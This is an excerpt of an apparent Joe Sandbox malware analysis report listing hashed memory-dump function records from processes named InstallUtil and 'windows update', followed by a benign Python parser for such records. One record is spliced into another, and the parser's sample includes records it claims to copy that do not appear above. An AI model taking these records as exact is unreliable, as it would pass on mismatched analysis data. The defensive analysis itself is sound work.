                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: d468273bae3e566c19b43333b14face854dceb1f942304427e303f8e2b1f77bb
                                                                                • Instruction ID: d657838b78e1ac55166cba1b8ca36465cc3812bdc6b45411b418cac597c57719
                                                                                • Opcode Fuzzy Hash: d468273bae3e566c19b43333b14face854dceb1f942304427e303f8e2b1f77bb
                                                                                • Instruction Fuzzy Hash: 5411F2B58003489FCB10DF9AD484BDEBBF8FB58321F108459E919A7240C379A944CFA1
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 05852075
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: abadb6025941921a6b15a4f002f227bb204d96dfa682697e2eb9b3245c84bc68
                                                                                • Instruction ID: afa145ee4f973167a474a4633bfb6877bfa1df65204ed50bc225f6a4f88b3bea
                                                                                • Opcode Fuzzy Hash: abadb6025941921a6b15a4f002f227bb204d96dfa682697e2eb9b3245c84bc68
                                                                                • Instruction Fuzzy Hash: DE1115B58002498FDB10DF9AC584BDEFBF8FB48320F10841AD919A3340C379A944CFA1
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 0585B5AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: de5a447a173b0f47262828b5ea565916edd3944bfc4d06f245239d6664928131
                                                                                • Instruction ID: a4e1bc386bb9e8ded29bd5ab5b4cbdc5020b2087ab925b6990c6dcd94866c48c
                                                                                • Opcode Fuzzy Hash: de5a447a173b0f47262828b5ea565916edd3944bfc4d06f245239d6664928131
                                                                                • Instruction Fuzzy Hash: 041112B5800349CFDB10DF99C585BDEBBF4FB58321F10845AE959A3240C379AA84CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2237541640.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_157d000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
                                                                                • Instruction ID: 424bd58ed75af175ca6e78bd2876a6a5b931a2bd61415203ee90ea82a6a808f3
                                                                                • Opcode Fuzzy Hash: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
                                                                                • Instruction Fuzzy Hash: D3210075604204DFCB16DF68E985B26BFB5FF88314F20C96DD90A0F256D33AD406CA61
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2237541640.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_157d000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a0b87fb8932297bdb6981f3d67939c8598be28b1db1a6d04a459693dc6ffb99
                                                                                • Instruction ID: b6707d8b41a019acbff81d0a2423f2f46f5c5726744ebd24f1f981e7e0b68659
                                                                                • API String ID:
                                                                                • Opcode ID: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
                                                                                • Instruction ID: bfb4950c0aba9652c2d20719c79f1c22be64b105bf5e63e5b43b8dcbe3db474f
                                                                                • Opcode Fuzzy Hash: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
                                                                                • Instruction Fuzzy Hash: B6214571500224DFDB25DF14D9C0F26FF66FB88318F208569ED0A0B256C3BAD416C7A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433121558.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_275d000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 632da462ab3781a994d44e401a29bc9b11409299511ec791a8585af932e6e095
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: AC11AC76504280DFDB16CF10D9C4B16FF72FB88328F2486A9DD094B256C37AD45ACBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8beae76e40544d2febd9bef4b7b750c0ba302cda3bf6d0354c896e0fadf8eff5
                                                                                • Instruction ID: 60934e4545a9ffa82ea30b136315e0dac115e183e82cb0d23a31ddc78d6a9558
                                                                                • Opcode Fuzzy Hash: 8beae76e40544d2febd9bef4b7b750c0ba302cda3bf6d0354c896e0fadf8eff5
                                                                                • Instruction Fuzzy Hash: 9AD0C779B441148FDA04AB78D55445CB760EF8427531006B5D136C71B1DA61D911C612
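Added example (not part of the Joe Sandbox report): a small parser for the "Memory Dump Source" records above, so the thousands of such entries in a full report can be triaged from a text export instead of by scrolling. It reads each record's bulleted fields, pulls the dump offset out of the Source File line, counts functions per dumped region, lists the functions that carry a String ID, and flags any record whose Opcode ID differs from its Opcode Fuzzy Hash (in the records on this page the two are always equal). The sample text inside the block is copied from three of the records above; the field names are taken from the report as rendered, and the assumption that a record always starts at a "Memory Dump Source" line is this example's own.

```python
import re
from collections import Counter

# Sample input: three records copied from the report section above
# (two from the 028A0000 dump of process 8, one from the 0275D000 dump).
SAMPLE = """\
Memory Dump Source
• Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
Similarity
• API ID:
• String ID: $]q
• API String ID: 0-1007455737
• Opcode ID: fa073c87f76d5436a847583d096ce3878bccf092eab60efe3c4bba6ef6f64513
• Instruction ID: 3e8a2d8a4028371a58fcb5c287f575283a67eec53b49adb88258b7a8844fe773
• Opcode Fuzzy Hash: fa073c87f76d5436a847583d096ce3878bccf092eab60efe3c4bba6ef6f64513
• Instruction Fuzzy Hash: 9421043A7443159FEB248A7DE8A0B2B77E9EF80628714443AD00EC7291DF71E812C790
Strings
Memory Dump Source
• Source File: 00000008.00000002.2433708087.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28a0000_windows update.jbxd
Similarity
• API ID:
• String ID: 8aq
• API String ID: 0-538729646
• Opcode ID: 85240802cf3559e4a131634f6c9121d6b9cb9757d0b15b5cca7d65cd7374ee31
• Instruction ID: d93b73fa7e52b290c7905fcb2eb129d636f6249398c5b05933aa6626972a7c7c
• Opcode Fuzzy Hash: 85240802cf3559e4a131634f6c9121d6b9cb9757d0b15b5cca7d65cd7374ee31
• Instruction Fuzzy Hash: 4CE08C30A0420DEBCB01EFB8EA4094EF7AAEB44244B2085A8840CA7254DA30AE009B91
Memory Dump Source
• Source File: 00000008.00000002.2433121558.000000000275D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0275D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_275d000_windows update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
• Instruction ID: bfb4950c0aba9652c2d20719c79f1c22be64b105bf5e63e5b43b8dcbe3db474f
• Opcode Fuzzy Hash: 32859998eaf728c3c4608a2351c359019ba9f55efbc857fbdfdba62047d76c6d
• Instruction Fuzzy Hash: B6214571500224DFDB25DF14D9C0F26FF66FB88318F208569ED0A0B256C3BAD416C7A2
"""

# A bulleted "• Key: value" field; the key ends at the first colon, so the
# comma-separated tail of the Source File line stays in the value.
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_records(text):
    """Split the rendered report into one dict per function record.

    Assumption (this example's, not the report's): every record begins at a
    line reading exactly "Memory Dump Source"; unbulleted labels such as
    "Joe Sandbox IDA Plugin", "Similarity" and "Strings" are skipped.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD.match(line)
        if m:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def dump_offset(record):
    """Return the 'Offset: XXXXXXXX' value from the Source File field, upper-cased."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", record.get("Source File", ""))
    return m.group(1).upper() if m else None


def functions_per_dump(records):
    """Count function records per dumped memory region."""
    return dict(Counter(dump_offset(r) for r in records))


def records_with_strings(records):
    """(offset, String ID) for every record that references a string."""
    return [(dump_offset(r), r["String ID"]) for r in records if r.get("String ID")]


def opcode_id_mismatches(records):
    """Records whose Opcode ID and Opcode Fuzzy Hash differ (none on this page)."""
    return [r for r in records if r.get("Opcode ID") != r.get("Opcode Fuzzy Hash")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("functions per dump:", functions_per_dump(recs))
    print("functions with strings:", records_with_strings(recs))
    print("opcode id mismatches:", len(opcode_id_mismatches(recs)))
```

Usage: paste the text export of the report's function section into SAMPLE (or read it from a file) and call the three summary functions; the per-offset counts tell you which injected region (here the non-PE-backed dumps at 028A0000 and 0275D000 in process 8) holds the bulk of the recovered code.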